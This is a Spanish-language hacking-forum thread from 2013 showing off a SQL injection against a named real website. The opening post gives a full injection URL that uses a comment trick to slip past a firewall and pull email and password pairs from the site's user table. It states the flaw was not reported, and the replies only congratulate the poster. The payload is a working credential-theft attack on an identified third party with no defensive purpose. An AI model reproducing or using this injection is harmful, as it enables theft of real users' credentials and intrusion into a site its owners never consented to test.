Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Muppet en Junio 25, 2013, 10:30:05 PM

Título: SQLI mygoodact.com WAF Bypass
Publicado por: Muppet en Junio 25, 2013, 10:30:05 PM
(http://i39.tinypic.com/1zzm5nn.png)

Vector: http://www.mygoodact.com/collectiondetailperson.php?id=212+/*!union*/+select+1,group_concat(concat_ws(char(58),email,pass) SEPARATOR 0x7e),3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+from+m_user+limit+1,1--+

Reportado: No
Título: Re:SQLI mygoodact.com WAF Bypass
Publicado por: Pr0ph3t en Junio 26, 2013, 06:34:26 AM
Estás on fire, buena hdbreaker.
Título: Re:SQLI mygoodact.com WAF Bypass
Publicado por: Cronos en Junio 26, 2013, 08:52:41 AM
Muy buena web!
Saludos,, Cronos.-
Título: Re:SQLI mygoodact.com WAF Bypass
Publicado por: morodog en Junio 26, 2013, 11:56:20 AM
Buena Hdbreaker! A tope! =)